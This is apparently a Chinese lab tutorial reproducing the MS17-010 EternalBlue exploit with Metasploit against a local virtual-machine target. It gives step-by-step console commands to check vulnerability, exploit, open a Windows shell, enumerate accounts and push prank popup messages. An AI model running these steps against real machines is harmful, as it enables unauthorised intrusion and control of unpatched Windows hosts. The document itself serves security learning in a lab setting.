后渗透 Metasploit 的基础玩法 —— 传奇经典漏洞 MS17-010 复现

MS17010，是 2017 年 4 - 5 月的一个核弹级漏洞编号。英文名称 Eternal Blue，中文名称永恒之蓝。

或许你没听说过这个编号，但是，只要是 2017 年 4 - 5 月这个时间内在互联网上活跃的人，几乎没有人不知道 WannaCry 勒索病毒（上图）。

2017 年 5 月 12 日，不法分子通过改造“永恒之蓝”制作出了 WannaCry 勒索病毒，极短的时间内席卷全球，包括中国在内的多个国家的高校、政府、企业内网均有中招，国内多个高校毕业生论文也遭到勒索，影响范围极大。

PS：有没有 2017 年大学毕业的伙伴？你们当年的论文有被勒索吗？

靶机镜像：https://pan.baidu.com/s/19YO3HBTVz2OZiDfKkAHJNw?pwd=r3ft

复现前提：保证防火墙关闭状态

靶机IP地址：192.168.225.140（虚拟机）

https://pan.baidu.com/s/19YO3HBTVz2OZiDfKkAHJNw?pwd=r3ft

第一步：运行 msfconsole 命令，启动 Metasploit 控制台

第二步：运行 search ms17_010 命令查找 MS17010 漏洞相关模块

第三步：运行 use 3 命令，使用第三个模块（辅助模块）准备查验目标机器是否符合利用条件

第四步：运行 show options 命令查看需要配置的参数

第五步：运行 set rhosts 192.168.225.140 设置远程IP地址（靶机地址）

第六步：运行 run 命令，执行当前模块，验证是否符合利用条件

接上面的控制台：

第一步：运行 back 命令，退出辅助模块

第二步：运行 search ms17_010 查看相关模块

第三步：运行 set 0 选择第 0 个模块（漏洞利用模块）

第四步：运行 show options 查看所需参数

第五步：运行 set rhosts 192.168.225.140 设置远程 IP （靶机。rhost 为 remote host 的缩写；参数 lhost 为 local host 的缩写）

第六步：运行 run 命令，开始利用。

第七步：出现 Win 字样，意味着利用成功

第一步：运行 ifconfig 命令查看当前控制台的 IP 地址

第二步：运行其他常用 Windows 控制台命令查看效果

第三步：运行 shell 命令，进入 Windows 控制台，尝试 echo 命令写入文件

▼ 写入文件

▼ 成功写入到桌面

第四步：运行 chcp 修改控制台编码，然后运行 msg 命令，试图在目标机器上弹窗。

# 修改控制台编码。防止中文乱码chcp 65001# 发送弹窗指令msg %username% /time:10 "hello"# msg 是 Windows 机器上的弹窗指令。常用写法：msg 目标机器名 [时间] 弹窗内容# %username% 是自动获取对方机器名称# /time:10 意思为延时 10s# hello 为要弹出的内容

发现报错：win-6dkaffuc3g9$ does not exist or is disconnected。

分析原因：机器名 win-6dkaffuc3g9$ 以 $ 符号结尾，通常为隐藏用户，可能是 msf 漏洞利用时自动创建的后门用户。在远程机器中无法直接访问。

解决思路：既然隐藏账户无法远程访问，那我们可以使用 net user 获取账户列表，在 msg 命令中不适用 %username% 自动获取机器名，换成手动指定账户。

第五步：运行 net user 命令，获取目标机器的用户列表。

运行结果：有三个可用账户：administrator、hola、Guest

administrator、hola、Guest

第六步：选择 hola 用户（我自己的账户，另外两个分别是管理员和访客账号），运行 msg 命令，再次尝试在目标机器上弹窗。

# 经过多次测试，以下弹窗命令建议手敲，直接复制有概率会出现编码问题导致运行失败# 如果 msg 命令报错，可以尝试 msg 命令的绝对路径：C:WindowsSystem32msg.exemsg hola /time:5 "hello hola, your computer is already under my control, please v me 50."

LOVING

YOU